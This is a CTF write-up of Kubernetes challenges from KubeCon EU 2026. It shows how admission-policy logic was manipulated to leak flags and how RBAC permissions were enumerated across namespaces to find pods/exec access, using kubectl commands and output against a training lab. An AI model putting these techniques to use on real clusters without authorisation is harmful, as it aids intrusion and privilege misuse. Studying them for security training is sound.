KubeCon EU 2026 CTF Writeup

Introduction

Another KubeCon EU, another set of 3 challenges from ControlPlane.

Challenge 1 - The Admission

Let’s get started. SSHing into the first challenge gives us the following message:

▄ ▗▖ █ █

▐█▌ ▐▌ ▀ ▀

▐█▌ ▟█▟▌▐█▙█▖ ██ ▗▟██▖▗▟██▖ ██ ▟█▙ ▐▙██▖

█ █ ▐▛ ▜▌▐▌█▐▌ █ ▐▙▄▖▘▐▙▄▖▘ █ ▐▛ ▜▌▐▛ ▐▌

███ ▐▌ ▐▌▐▌█▐▌ █ ▀▀█▖ ▀▀█▖ █ ▐▌ ▐▌▐▌ ▐▌

▗█ █▖▝█▄█▌▐▌█▐▌▗▄█▄▖▐▄▄▟▌▐▄▄▟▌▗▄█▄▖▝█▄█▘▐▌ ▐▌

▝▘ ▝▘ ▝▀▝▘▝▘▀▝▘▝▀▀▀▘ ▀▀▀ ▀▀▀ ▝▀▀▀▘ ▝▀▘ ▝▘ ▝▘

Welcome to The Admission, the most locked Pub in Amsterdam!

Please, place an Order and enjoy our amazing offer!

Example order:

---
apiVersion: amsterdam.pub/v2
kind: Order
metadata:
  name: order
  namespace: table-1
spec:
  items:
  - name: < product in the menu >

To have a look at the menu

kubectl get menu menu -o yaml

OK, looks like we are at a pub and we can place an order. Based on the name, I’m guessing this has to do with admission controllers.

Before we look at the menu, let’s just get an idea of our permissions in this cluster.

root@table-1-7c87556f94-86c8k:~# kubectl auth whoami

ATTRIBUTE VALUE

Username system:serviceaccount:table-1:table-1

UID da009f75-7855-4b50-aec5-9393bdcf803f

Groups [system:serviceaccounts system:serviceaccounts:table-1 system:authenticated]

Extra: authentication.kubernetes.io/credential-id [JTI=cb2bd612-29c4-48ee-8481-76609095047e]

Extra: authentication.kubernetes.io/node-name [node-1]

Extra: authentication.kubernetes.io/node-uid [51e936ca-08ac-48fa-91e3-ec7da8cba07d]

Extra: authentication.kubernetes.io/pod-name [table-1-7c87556f94-86c8k]

Extra: authentication.kubernetes.io/pod-uid [41a7c983-d998-4018-b4df-8681ca7ffd75]

root@table-1-7c87556f94-86c8k:~# kubectl auth can-i --list

Resources Non-Resource URLs Resource Names Verbs

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

adminrules.amsterdam.pub [] [] [get list watch create update patch]

orders.amsterdam.pub [] [] [get watch list create update patch delete]

namespaces [] [] [get watch list]

validatingadmissionpolicies.admissionregistration.k8s.io [] [] [get watch list]

validatingadmissionpolicybindings.admissionregistration.k8s.io [] [] [get watch list]

menus.amsterdam.pub [] [] [get watch list]

[/.well-known/openid-configuration/] [] [get]

[/.well-known/openid-configuration] [] [get]

[/api/*] [] [get]

[/api] [] [get]

[/apis/*] [] [get]

[/apis] [] [get]

[/healthz] [] [get]

[/healthz] [] [get]

[/livez] [] [get]

[/livez] [] [get]

[/openapi/*] [] [get]

[/openapi] [] [get]

[/openid/v1/jwks/] [] [get]

[/openid/v1/jwks] [] [get]

[/readyz] [] [get]

[/readyz] [] [get]

[/version/] [] [get]

[/version/] [] [get]

[/version] [] [get]

[/version] [] [get]

OK, seems simple enough. The fact that resources under admissionregistration.k8s.io are listed supports this being an admission controller challenge. Let’s delay the menu a tad longer and actually look at the admission policies.

root@table-1-7c87556f94-86c8k:~# kubectl get validatingadmissionpolicies.admissionregistration.k8s.io -o yaml

apiVersion: v1

items:

- apiVersion: admissionregistration.k8s.io/v1

kind: ValidatingAdmissionPolicy

metadata:

annotations:

kubectl.kubernetes.io/last-applied-configuration: |

{"apiVersion":"admissionregistration.k8s.io/v1","kind":"ValidatingAdmissionPolicy","metadata":{"annotations":{},"name":"create-order-v1"},"spec":{"matchConstraints":{"matchPolicy":"Exact","resourceRules":[{"apiGroups":["amsterdam.pub"],"apiVersions":["v1"],"operations":["CREATE"],"resources":["orders"]}]},"paramKind":{"apiVersion":"amsterdam.pub/v1","kind":"RestaurantRule"},"validations":[{"expression":"has(object.isTestOrder) \u0026\u0026 !object.isTestOrder\n","messageExpression":"\"This field is not supposed to be used internally, sorry\"\n"},{"expression":"object.spec.items.all(orderItem, \n params.menu.exists(menuItem, menuItem.name == orderItem.name)\n)\n","messageExpression":"\"I think you have to have a look again at the menu...\"\n"},{"expression":"object.spec.items.all(orderItem, \n !orderItem.extraSauce || \n params.menu.exists(menuItem, menuItem.allowExtraSauce == true \u0026\u0026 orderItem.name==menuItem.name\n )\n)\n","messageExpression":"\"Are you really sure you are supposed to put sauce there?\"\n"},{"expression":"object.spec.items.exists(orderItem, \n orderItem.extraSauce\n )\n","messageExpression":"\"You should really try the extra sauce!\"\n"},{"expression":"has(object.flags) \u0026\u0026 has(object.flags.flag1) \u0026\u0026 object.flags.flag1 == params.flags.flag1\n","messageExpression":"\"Flag 1 is: \" + params.flags.flag1\n"}]}}

creationTimestamp: "2026-03-25T10:17:35Z"

generation: 1

name: create-order-v1

resourceVersion: "721"

uid: 5ed3eb4c-d55f-4899-8a8e-41c9ca58a7bc

spec:

failurePolicy: Fail

matchConstraints:

matchPolicy: Exact

namespaceSelector: {}

objectSelector: {}

resourceRules:

- apiGroups:

- amsterdam.pub

apiVersions:

- v1

operations:

- CREATE

resources:

- orders

scope: '*'

paramKind:

apiVersion: amsterdam.pub/v1

kind: RestaurantRule

validations:

- expression: |

has(object.isTestOrder) && !object.isTestOrder

messageExpression: |

"This field is not supposed to be used internally, sorry"

- expression: "object.spec.items.all(orderItem, \n params.menu.exists(menuItem,

menuItem.name == orderItem.name)\n)\n"

messageExpression: |

"I think you have to have a look again at the menu..."

- expression: "object.spec.items.all(orderItem, \n !orderItem.extraSauce || \n

\ params.menu.exists(menuItem, menuItem.allowExtraSauce == true && orderItem.name==menuItem.name\n

\ )\n)\n"

messageExpression: |

"Are you really sure you are supposed to put sauce there?"

- expression: "object.spec.items.exists(orderItem, \n orderItem.extraSauce\n

\ )\n"

messageExpression: |

"You should really try the extra sauce!"

- expression: |

has(object.flags) && has(object.flags.flag1) && object.flags.flag1 == params.flags.flag1

messageExpression: |

"Flag 1 is: " + params.flags.flag1

status:

observedGeneration: 1

typeChecking: {}

- apiVersion: admissionregistration.k8s.io/v1

kind: ValidatingAdmissionPolicy

metadata:

annotations:

kubectl.kubernetes.io/last-applied-configuration: |

{"apiVersion":"admissionregistration.k8s.io/v1","kind":"ValidatingAdmissionPolicy","metadata":{"annotations":{},"name":"create-order-v2"},"spec":{"matchConstraints":{"matchPolicy":"Exact","resourceRules":[{"apiGroups":["amsterdam.pub"],"apiVersions":["v2"],"operations":["CREATE"],"resources":["orders"]}]},"validations":[{"expression":"1 == 0\n","messageExpression":"\"Sorry, Order v2 cannot be processed right now. Please, try an older version.\"\n"}]}}

creationTimestamp: "2026-03-25T10:17:35Z"

generation: 1

name: create-order-v2

resourceVersion: "734"

uid: 5f6f21a9-b189-43a2-871a-f6cb2601fefd

spec:

failurePolicy: Fail

matchConstraints:

matchPolicy: Exact

namespaceSelector: {}

objectSelector: {}

resourceRules:

- apiGroups:

- amsterdam.pub

apiVersions:

- v2

operations:

- CREATE

resources:

- orders

scope: '*'

validations:

- expression: |

1 == 0

messageExpression: |

"Sorry, Order v2 cannot be processed right now. Please, try an older version."

status:

observedGeneration: 1

typeChecking: {}

- apiVersion: admissionregistration.k8s.io/v1

kind: ValidatingAdmissionPolicy

metadata:

annotations:

kubectl.kubernetes.io/last-applied-configuration: |

{"apiVersion":"admissionregistration.k8s.io/v1","kind":"ValidatingAdmissionPolicy","metadata":{"annotations":{},"name":"delete-order"},"spec":{"matchConstraints":{"matchPolicy":"Exact","resourceRules":[{"apiGroups":["amsterdam.pub"],"apiVersions":["*"],"operations":["DELETE"],"resources":["orders"]}]},"paramKind":{"apiVersion":"amsterdam.pub/v1","kind":"RestaurantRule"},"validations":[{"expression":"has(oldObject.isTestOrder) \u0026\u0026 bool(oldObject.isTestOrder)\n","messageExpression":"\"What are you doing? Only test orders can be deleted\"\n"},{"expression":"1 == 0\n","messageExpression":"\"I think someone really messed-up our ordering system... Flag 2 is: \" + params.flags.flag2\n"}]}}

creationTimestamp: "2026-03-25T10:17:35Z"

generation: 1

name: delete-order

resourceVersion: "737"

uid: 80bf7e34-cd00-49e0-bdde-6aee29c6688c

spec:

failurePolicy: Fail

matchConstraints:

matchPolicy: Exact

namespaceSelector: {}

objectSelector: {}

resourceRules:

- apiGroups:

- amsterdam.pub

apiVersions:

- '*'

operations:

- DELETE

resources:

- orders

scope: '*'

paramKind:

apiVersion: amsterdam.pub/v1

kind: RestaurantRule

validations:

- expression: |

has(oldObject.isTestOrder) && bool(oldObject.isTestOrder)

messageExpression: |

"What are you doing? Only test orders can be deleted"

- expression: |

1 == 0

messageExpression: |

"I think someone really messed-up our ordering system... Flag 2 is: " + params.flags.flag2

status:

observedGeneration: 1

typeChecking: {}

- apiVersion: admissionregistration.k8s.io/v1

kind: ValidatingAdmissionPolicy

metadata:

annotations:

kubectl.kubernetes.io/last-applied-configuration: |

{"apiVersion":"admissionregistration.k8s.io/v1","kind":"ValidatingAdmissionPolicy","metadata":{"annotations":{},"name":"update-order-v1"},"spec":{"matchConstraints":{"matchPolicy":"Exact","resourceRules":[{"apiGroups":["amsterdam.pub"],"apiVersions":["v1"],"operations":["UPDATE"],"resources":["orders"]}]},"paramKind":{"apiVersion":"amsterdam.pub/v1","kind":"AdminRule"},"validations":[{"expression":"request.userInfo.username in params.adminServiceAccounts\n","messageExpression":"\"Orders can only be updated by admins\"\n"},{"expression":"has(oldObject.isTestOrder) \u0026\u0026 has(object.isTestOrder) \u0026\u0026 !oldObject.isTestOrder \u0026\u0026 object.isTestOrder\n","messageExpression":"\"No modification is allowed\"\n"}]}}

creationTimestamp: "2026-03-25T10:17:35Z"

generation: 1

name: update-order-v1

resourceVersion: "722"

uid: 5a623ad9-6a77-408b-90b4-2b6d360c459a

spec:

failurePolicy: Fail

matchConstraints:

matchPolicy: Exact

namespaceSelector: {}

objectSelector: {}

resourceRules:

- apiGroups:

- amsterdam.pub

apiVersions:

- v1

operations:

- UPDATE

resources:

- orders

scope: '*'

paramKind:

apiVersion: amsterdam.pub/v1

kind: AdminRule

validations:

- expression: |

request.userInfo.username in params.adminServiceAccounts

messageExpression: |

"Orders can only be updated by admins"

- expression: |

has(oldObject.isTestOrder) && has(object.isTestOrder) && !oldObject.isTestOrder && object.isTestOrder

messageExpression: |

"No modification is allowed"

status:

observedGeneration: 1

typeChecking: {}

kind: List

metadata:

resourceVersion: ""
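As a reading aid, the resourceRules of the four policies above can be condensed into a small lookup. This is a minimal Python sketch and not part of the challenge: the POLICIES table is transcribed by hand from the dump, matching_policies is a hypothetical helper, and it assumes that every policy has a binding and that matchPolicy: Exact means a request only matches rules that name its own API version.

```python
from typing import List

# Transcribed from the resourceRules in the dump (group and resource are
# always amsterdam.pub / orders, so only version and operation vary).
POLICIES = {
    "create-order-v1": {"versions": {"v1"}, "operations": {"CREATE"}},
    "create-order-v2": {"versions": {"v2"}, "operations": {"CREATE"}},
    "delete-order": {"versions": {"*"}, "operations": {"DELETE"}},
    "update-order-v1": {"versions": {"v1"}, "operations": {"UPDATE"}},
}


def matching_policies(version: str, operation: str) -> List[str]:
    """Names of policies whose rules cover this API version and operation."""
    return sorted(
        name
        for name, rule in POLICIES.items()
        if operation in rule["operations"]
        and ("*" in rule["versions"] or version in rule["versions"])
    )


for version in ("v1", "v2"):
    for operation in ("CREATE", "UPDATE", "DELETE"):
        print(version, operation, matching_policies(version, operation))
```

In this model a v1 create is checked only by create-order-v1, a delete of any version hits delete-order, and matching_policies("v2", "UPDATE") comes back empty because no rule in the dump covers v2 updates.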

OK, so we have gained a lot from that. It looks like a set of policies around orders, each with constraints that a request has to meet. Flag 1 appears in the create-order-v1 admission policy, so we need to make our way through its expressions. They gave us an initial order YAML at the beginning, so let’s just add a random item from the menu and see what happens. (I could decode the policies, but where’s the fun in that?)

root@table-1-7c87556f94-86c8k:~# kubectl get menu menu -o yaml

apiVersion: amsterdam.pub/v1

kind: Menu

menu:

- allowExtraSauce: true

name: Bitterballen

- allowExtraSauce: false

name: Stroopwafel

- allowExtraSauce: true

name: Frites with Satay Sauce

- allowExtraSauce: false

name: Erwtensoep (Snert)

- allowExtraSauce: false

name: Poffertjes

- allowExtraSauce: false

name: Chocomel

- allowExtraSauce: false

name: Draft beer

- allowExtraSauce: true

name: Ossenworst

- allowExtraSauce: false

name: Jenever

- allowExtraSauce: true

name: Kibbeling

metadata:

annotations:

kubectl.kubernetes.io/last-applied-configuration: |

{"apiVersion":"amsterdam.pub/v1","kind":"Menu","menu":[{"allowExtraSauce":true,"name":"Bitterballen"},{"allowExtraSauce":false,"name":"Stroopwafel"},{"allowExtraSauce":true,"name":"Frites with Satay Sauce"},{"allowExtraSauce":false,"name":"Erwtensoep (Snert)"},{"allowExtraSauce":false,"name":"Poffertjes"},{"allowExtraSauce":false,"name":"Chocomel"},{"allowExtraSauce":false,"name":"Draft beer"},{"allowExtraSauce":true,"name":"Ossenworst"},{"allowExtraSauce":false,"name":"Jenever"},{"allowExtraSauce":true,"name":"Kibbeling"}],"metadata":{"annotations":{},"name":"menu"}}

creationTimestamp: "2026-03-25T10:17:34Z"

generation: 1

name: menu

resourceVersion: "694"

uid: 10e11d0b-1d01-4a7f-a472-822174cf095e

root@table-1-7c87556f94-86c8k:~# kubectl apply -f order.yml

The orders "order1" is invalid: : ValidatingAdmissionPolicy 'create-order-v2' with binding 'create-order-v2' denied request: Sorry, Order v2 cannot be processed right now. Please, try an older version.

Ah right, yeah, this is for v1 not v2. Let’s switch that out.

root@table-1-7c87556f94-86c8k:~# kubectl apply -f order.yml

The orders "order1" is invalid: : ValidatingAdmissionPolicy 'create-order-v1' with binding 'create-order-v1' denied request: You should really try the extra sauce!

OK, let’s pick a menu item with sauce and make sure to select the extra sauce.

root@table-1-7c87556f94-86c8k:~# kubectl apply -f order.yml

The orders "order1" is invalid: : ValidatingAdmissionPolicy 'create-order-v1' with binding 'create-order-v1' denied request: Flag 1 is: flag_ctf{3xtr4_sauce_is_always_nice}

Woo flag 1. The final order.yml was:

apiVersion: amsterdam.pub/v1
kind: Order
metadata:
  name: order1
  namespace: table-1
spec:
  items:
  - name: Bitterballen
    extraSauce: true
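For anyone who prefers reading the policy over poking at it, the item and flag checks in create-order-v1 can be approximated in Python. This is only a sketch under assumptions: first_denial and the two-entry MENU are hypothetical, a missing extraSauce is treated as false, the isTestOrder check is left out, and the first failing validation is assumed to be the one whose message is reported (which is what the transcripts above show).

```python
from typing import List, Optional

# Two entries copied from the menu output above.
MENU = [
    {"name": "Bitterballen", "allowExtraSauce": True},
    {"name": "Stroopwafel", "allowExtraSauce": False},
]


def first_denial(order: dict, menu: List[dict], flag1: str) -> Optional[str]:
    """Return the message of the first failing check, or None if all pass."""
    items = order.get("spec", {}).get("items", [])

    def sauce(item: dict) -> bool:
        # Assumption: an absent extraSauce behaves like false.
        return bool(item.get("extraSauce", False))

    # Every ordered item must exist on the menu.
    if not all(any(m["name"] == i["name"] for m in menu) for i in items):
        return "I think you have to have a look again at the menu..."
    # Extra sauce is only accepted on items whose menu entry allows it.
    if not all(
        (not sauce(i))
        or any(m["allowExtraSauce"] and m["name"] == i["name"] for m in menu)
        for i in items
    ):
        return "Are you really sure you are supposed to put sauce there?"
    # At least one item must carry extra sauce.
    if not any(sauce(i) for i in items):
        return "You should really try the extra sauce!"
    # The order must already carry the right flag; if not, the message leaks it.
    if order.get("flags", {}).get("flag1") != flag1:
        return "Flag 1 is: " + flag1
    return None
```

Calling first_denial with an order for Bitterballen with extraSauce: true and no flags field returns the "Flag 1 is: ..." message, which mirrors the final denial in the transcript.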

Onwards.

Let’s actually look at the policies for this one, so it’s less… brute-forcey. The key bit for flag 2 is these expressions in a DELETE policy (delete-order):

validations:
- expression: |
    has(oldObject.isTestOrder) && bool(oldObject.isTestOrder)
  messageExpression: |
    "What are you doing? Only test orders can be deleted"
- expression: |
    1 == 0
  messageExpression: |
    "I think someone really messed-up our ordering system... Flag 2 is: " + params.flags.flag2

Essentially, we need an order whose isTestOrder is true. Deleting it then gets past the first check and trips the always-false 1 == 0 check, whose message contains the flag. However, creating a v1 object with isTestOrder set to true won’t work as the create-order-v1 policy blocks that, and the create-order-v2 policy blocks v2 objects entirely. I wonder if I could create a v3 object?

root@table-1-7c87556f94-86c8k:~# kubectl apply -f order.yml

error: resource mapping not found for name: "order2" namespace: "table-1" from "order.yml": no matches for kind "Order" in version "amsterdam.pub/v3"

ensure CRDs are installed first

Nope, never mind. OK, let’s look at the other policies. The update-order-v1 policy sets the rules for updating an order.

spec:
  failurePolicy: Fail
  matchConstraints:
    matchPolicy: Exact
    namespaceSelector: {}
    objectSelector: {}
    resourceRules:
    - apiGroups:
      - amsterdam.pub
      apiVersions:
      - v1
      operations:
      - UPDATE
      resources:
      - orders
      scope: '*'
  paramKind:
    apiVersion: amsterdam.pub/v1
    kind: AdminRule
  validations:
  - expression: |
      request.userInfo.username in params.adminServiceAccounts
    messageExpression: |
      "Orders can only be updated by admins"
  - expression: |
      has(oldObject.isTestOrder) && has(object.isTestOrder) && !oldObject.isTestOrder && object.isTestOrder
    messageExpression: |
      "No modification is allowed"

OK, so this is effectively saying that an admin can flip isTestOrder from false to true, and that no other update is allowed. This is probably it, so let’s create the object with isTestOrder set to false. We also need to add flag 1 to the order to satisfy the last constraint in create-order-v1. Hopefully I’m an admin, else we will need to dig into that next.

apiVersion: amsterdam.pub/v1
kind: Order
metadata:
  name: order2
  namespace: table-1
isTestOrder: false
flags:
  flag1: "flag_ctf{3xtr4_sauce_is_always_nice}"
spec:
  items:
  - name: Bitterballen
    extraSauce: true

With that created, we can edit it so that isTestOrder is true, and try to delete it.

root@table-1-7c87556f94-86c8k:~# kubectl edit order order2

order.amsterdam.pub/order2 edited

root@table-1-7c87556f94-86c8k:~# kubectl delete -f order.yml

The orders "order2" is invalid: : ValidatingAdmissionPolicy 'delete-order' with binding 'delete-order' denied request: I think someone really messed-up our ordering system... Flag 2 is: flag_ctf{never_forget_about_RBAC_and_versioning}

Nice. There is flag 2. That was good.
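The create, update and delete rules around isTestOrder can be modelled roughly in Python to see why the order has to start as false and end as true. This is a sketch under assumptions rather than the cluster's actual logic: the function names and the example usernames are hypothetical, the contents of the AdminRule are not shown in this writeup, and an absent isTestOrder is treated like false at creation time (as the flag 1 transcript suggests).

```python
from typing import List

DELETE_DENIED = "What are you doing? Only test orders can be deleted"
FLAG2_PREFIX = "I think someone really messed-up our ordering system... Flag 2 is: "


def create_rejects(obj: dict) -> bool:
    # create-order-v1: has(object.isTestOrder) && !object.isTestOrder
    # Assumption: a missing field behaves like false, so only true is refused.
    return bool(obj.get("isTestOrder", False))


def update_allows(old: dict, new: dict, username: str, admins: List[str]) -> bool:
    # update-order-v1: the caller must be listed as an admin, and the only
    # accepted change is isTestOrder going from false to true.
    is_admin = username in admins
    flips = (
        "isTestOrder" in old
        and "isTestOrder" in new
        and not old["isTestOrder"]
        and bool(new["isTestOrder"])
    )
    return is_admin and flips


def delete_message(old: dict, flag2: str) -> str:
    # delete-order: a non-test order is refused by the first check; a test
    # order then fails the always-false `1 == 0` check, which leaks the flag.
    if not ("isTestOrder" in old and bool(old["isTestOrder"])):
        return DELETE_DENIED
    return FLAG2_PREFIX + flag2
```

In this model, delete_message({"isTestOrder": False}, flag) only returns the "Only test orders can be deleted" message, while the same call after the false to true edit returns the flag message, matching the transcript above.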

Challenge 2 - Meshing Around

Connecting to the next challenge we get the following message.

_ _ _ ____ ____ _ _ _ _ _ __ __ ____ __ _ _ _ _ ____

( \/ \/ )( __)/ ___)/ )( \(_) ( ( \ / _\ ___ / _\ ( _ \ / \ / )( \( ( \( _ \

) ( ) _) \___ \) __ ( )( / / ( (_ \(___)/ \ ) /( () )) \/ (/ / )(_) )

(_/\/\_) (____)(____/\_)(_/(__)\_)__) \__/ \_/\_/(_)\_) \__/ \____/\_)__)(____/

Welcome to KubeCon EU 2026!

Operation: Shadow Mesh (Amsterdam Edition)

Welkom, Operators! The target is locked inside a strict Linkerd Service Mesh, with perimeters tighter than Amsterdam's bike lanes at rush hour.

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Hint: Know Your Turf > Your privileges vary by neighborhood. This will be crucial across the entire operation, so it's highly recommended to keep these two commands distinct:

- kubectl auth can-i --list: This checks your general permissions at the cluster level (or within the default namespace).

- kubectl auth can-i --list -n <namespace name>: This queries your exact permissions confined to a specific, targeted namespace.

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

To begin your heist, knock on the front door of the Envoy Gateway IP

export GWIP=$(kubectl get svc -n envoy-gateway-system -o custom-columns=NAME:.metadata.name,IP:.spec.clusterIP --no-headers | grep '^envoy-default-public-gateway-' | awk '{print $2}')

curl -k https://$GWIP

The first flag is waiting for you there, but you'll need to dig around your environment for the right keys to get inside.

The gateway is bouncing your request because you are missing a client certificate.

Veel succes (Good luck), Operator! Stay stealthy and mind the bikes.

OK, let’s try their commands, although the message implies they won’t work and that we will need to start looking at permissions.

root@jumppod-cd5dfbd7-4ttlf:~# export GWIP=$(kubectl get svc -n envoy-gateway-system -o custom-columns=NAME:.metadata.name,IP:.spec.clusterIP --no-headers | grep '^envoy-default-public-gateway-' | awk '{print $2}')

root@jumppod-cd5dfbd7-4ttlf:~# curl -k https://$GWIP

curl: (56) OpenSSL SSL_read: error:0A000126:SSL routines::unexpected eof while reading, errno 0

As expected.

Let’s start enumerating permissions.

root@jumppod-cd5dfbd7-4ttlf:~# kubectl auth whoami

ATTRIBUTE VALUE

Username system:serviceaccount:default:jumppod

UID 77320a82-8bb3-4369-be17-74c43a02ac47

Groups [system:serviceaccounts system:serviceaccounts:default system:authenticated]

Extra: authentication.kubernetes.io/credential-id [JTI=cbdc8ae6-924e-45ee-b142-662f2dbe82ba]

Extra: authentication.kubernetes.io/node-name [node-2]

Extra: authentication.kubernetes.io/node-uid [621beb8d-48b1-47f6-8417-e8fa679d8a2c]

Extra: authentication.kubernetes.io/pod-name [jumppod-cd5dfbd7-4ttlf]

Extra: authentication.kubernetes.io/pod-uid [2da549fc-c26f-4c19-afc2-8f691cf5a4f3]

root@jumppod-cd5dfbd7-4ttlf:~# kubectl auth can-i --list

Resources Non-Resource URLs Resource Names Verbs

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

namespaces [] [] [get watch list]

services [] [] [get watch list]

clienttrafficpolicies.gateway.envoyproxy.io [] [] [get watch list]

envoyproxies.gateway.envoyproxy.io [] [] [get watch list]

gateways.gateway.networking.k8s.io [] [] [get watch list]

[/.well-known/openid-configuration/] [] [get]

[/.well-known/openid-configuration] [] [get]

[/api/*] [] [get]

[/api] [] [get]

[/apis/*] [] [get]

[/apis] [] [get]

[/healthz] [] [get]

[/healthz] [] [get]

[/livez] [] [get]

[/livez] [] [get]

[/openapi/*] [] [get]

[/openapi] [] [get]

[/openid/v1/jwks/] [] [get]

[/openid/v1/jwks] [] [get]

[/readyz] [] [get]

[/readyz] [] [get]

[/version/] [] [get]

[/version/] [] [get]

[/version] [] [get]

[/version] [] [get]

Looks like we can list namespaces, so let’s enumerate them all and check our permissions in each one.

root@jumppod-cd5dfbd7-4ttlf:~# kubectl get ns | grep -v NAME | awk '{print $1}' | while read ns ; do echo $ns; kubectl auth can-i --list -n $ns | grep -v "^ " ; done

backend

Resources Non-Resource URLs Resource Names Verbs

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

namespaces [] [] [get watch list]

services [] [] [get watch list]

clienttrafficpolicies.gateway.envoyproxy.io [] [] [get watch list]

envoyproxies.gateway.envoyproxy.io [] [] [get watch list]

gateways.gateway.networking.k8s.io [] [] [get watch list]

default

Resources Non-Resource URLs Resource Names Verbs

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

namespaces [] [] [get watch list]

services [] [] [get watch list]

clienttrafficpolicies.gateway.envoyproxy.io [] [] [get watch list]

envoyproxies.gateway.envoyproxy.io [] [] [get watch list]

gateways.gateway.networking.k8s.io [] [] [get watch list]

envoy-gateway-system

Resources Non-Resource URLs Resource Names Verbs

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

namespaces [] [] [get watch list]

services [] [] [get watch list]

clienttrafficpolicies.gateway.envoyproxy.io [] [] [get watch list]

envoyproxies.gateway.envoyproxy.io [] [] [get watch list]

gateways.gateway.networking.k8s.io [] [] [get watch list]

kube-node-lease

Resources Non-Resource URLs Resource Names Verbs

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

namespaces [] [] [get watch list]

services [] [] [get watch list]

clienttrafficpolicies.gateway.envoyproxy.io [] [] [get watch list]

envoyproxies.gateway.envoyproxy.io [] [] [get watch list]

gateways.gateway.networking.k8s.io [] [] [get watch list]

kube-public

Resources Non-Resource URLs Resource Names Verbs

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

namespaces [] [] [get watch list]

services [] [] [get watch list]

clienttrafficpolicies.gateway.envoyproxy.io [] [] [get watch list]

envoyproxies.gateway.envoyproxy.io [] [] [get watch list]

gateways.gateway.networking.k8s.io [] [] [get watch list]

kube-system

Resources Non-Resource URLs Resource Names Verbs

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

namespaces [] [] [get watch list]

services [] [] [get watch list]

clienttrafficpolicies.gateway.envoyproxy.io [] [] [get watch list]

envoyproxies.gateway.envoyproxy.io [] [] [get watch list]

gateways.gateway.networking.k8s.io [] [] [get watch list]

linkerd

Resources Non-Resource URLs Resource Names Verbs

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

namespaces [] [] [get watch list]

services [] [] [get watch list]

clienttrafficpolicies.gateway.envoyproxy.io [] [] [get watch list]

envoyproxies.gateway.envoyproxy.io [] [] [get watch list]

gateways.gateway.networking.k8s.io [] [] [get watch list]

production

Resources Non-Resource URLs Resource Names Verbs

pods/exec [] [] [create]

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

pods [] [] [get list watch]

namespaces [] [] [get watch list]

services [] [] [get watch list]

deployments.apps [] [] [get watch list]

clienttrafficpolicies.gateway.envoyproxy.io [] [] [get watch list]

envoyproxies.gateway.envoyproxy.io [] [] [get watch list]

gateways.gateway.networking.k8s.io [] [] [get watch list]

pods/log [] [] [get]

supersecret

Resources Non-Resource URLs Resource Names Verbs

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

meshtlsauthentications.policy.linkerd.io [] [] [get watch list update patch]

namespaces [] [] [get watch list]

services [] [] [get watch list]

clienttrafficpolicies.gateway.envoyproxy.io [] [] [get watch list]

envoyproxies.gateway.envoyproxy.io [] [] [get watch list]

gateways.gateway.networking.k8s.io [] [] [get watch list]
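Most of those tables are identical, so the interesting rows are the ones a namespace has on top of default. A rough Python sketch of that diff, assuming the loop output has been saved as text in the shape shown above (a bare namespace name followed by its table); parse_rules and extras are hypothetical helpers, not kubectl features.

```python
from typing import Dict, FrozenSet, Set, Tuple

Rule = Tuple[str, FrozenSet[str]]


def parse_rules(output: str) -> Dict[str, Set[Rule]]:
    """Group (resource, verbs) rows under the namespace line preceding them."""
    rules: Dict[str, Set[Rule]] = {}
    current = None
    for raw in output.splitlines():
        line = raw.strip()
        if not line or line.startswith("Resources"):
            continue  # skip blank lines and table headers
        parts = line.split()
        if len(parts) == 1:
            # A single token on its own line is a namespace name.
            current = parts[0]
            rules[current] = set()
            continue
        if current is None:
            continue
        # Verbs are the contents of the last [...] group on the row.
        verbs = frozenset(line[line.rfind("[") + 1 : line.rfind("]")].split())
        rules[current].add((parts[0], verbs))
    return rules


def extras(rules: Dict[str, Set[Rule]], baseline: str = "default") -> Dict[str, Set[Rule]]:
    """Rows each namespace has that the baseline namespace does not."""
    base = rules.get(baseline, set())
    return {ns: found - base for ns, found in rules.items() if found - base}
```

Fed the output above, extras would be expected to surface only production and supersecret, since every other namespace repeats the default table.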

Skimming that, it looks like I have pods/exec in production. Let’s jump in there and have a peek around.

